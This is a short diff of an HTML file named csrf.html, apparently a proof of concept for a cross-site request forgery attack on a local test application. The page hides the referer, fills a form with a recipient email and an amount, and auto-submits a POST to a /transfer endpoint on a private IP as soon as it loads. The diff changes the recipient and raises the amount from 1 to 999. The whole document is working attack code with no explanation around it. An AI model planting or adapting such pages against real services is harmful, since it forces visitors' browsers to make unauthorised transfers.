--- a/csrf.html
+++ b/csrf.html
@@ -2,8 +2,8 @@
   <meta name="referer" content="never">
     <body>
         <form action="http://192.168.2.98:55824/transfer" method="POST">
-            <input type="text" class="form-control" value="xyz@gmail.com">
-        <input type="number" class="form-control" value="1" id="inputAmount" >
+            <input type="text" class="form-control" value="test@gmail.com">
+        <input type="number" class="form-control" value="999" id="inputAmount" >
         </form>
         <script>
             document.forms[0].submit();
